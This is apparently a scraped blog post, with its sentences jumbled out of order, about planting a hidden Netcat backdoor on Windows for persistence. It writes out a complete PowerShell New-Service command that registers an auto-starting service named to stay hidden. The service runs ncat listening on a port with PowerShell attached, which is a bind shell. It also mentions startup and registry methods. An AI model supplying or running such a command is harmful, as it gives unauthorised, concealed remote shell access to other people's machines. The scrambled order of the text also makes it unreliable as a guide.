The author uses the Windows startup process to execute Netcat while Windows is logging in the user. But… Using Windows RegistryĪfter searching a bit around what other approach we could use, I came across this article called 10 Steps to Use NetCat as a Backdoor in Windows 7 System () and thought, let’s give it a try. The second service asks me to enter a password for the Administrator. In the screenshot you see, the first service will have no real privileges. Unfortunately, this approach will not work when adding a service to be running as an Administrator. Putting this all together we get the following command: New-Service -BinaryPathName ‘“C:\Program Files (x86)\Nmap\ncat.exe” -lnp 4445 -e powershell.exe’ -DisplayName -Name “4hiddenbackdoor” -StartupType “Automatic” -Description “No one will know what I do with this name!” Conclusions using Windows Services -Description “No one will know what I do with this name!”.-BinaryPathName ‘“C:\Program Files (x86)\Nmap\ncat.exe” -lnp 4445 -e powershell.exe’.Let’s build our New-Service command, we need the following parameters: With the command “where ncat”, we get the path and save it for later use. To continue, we need the exact installation location of Netcat. So swap the “-e cmd.exe” with “-e powershell.exe”. Before we start, let’s look at the official Microsoft documentation New-Service () - PowerShell | Microsoft Docs.įirst, we want to use powershell.exe instead of cmd.exe for our connection. Windows services offer us the possibility to execute our Netcat command automatically and hidden from the user.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |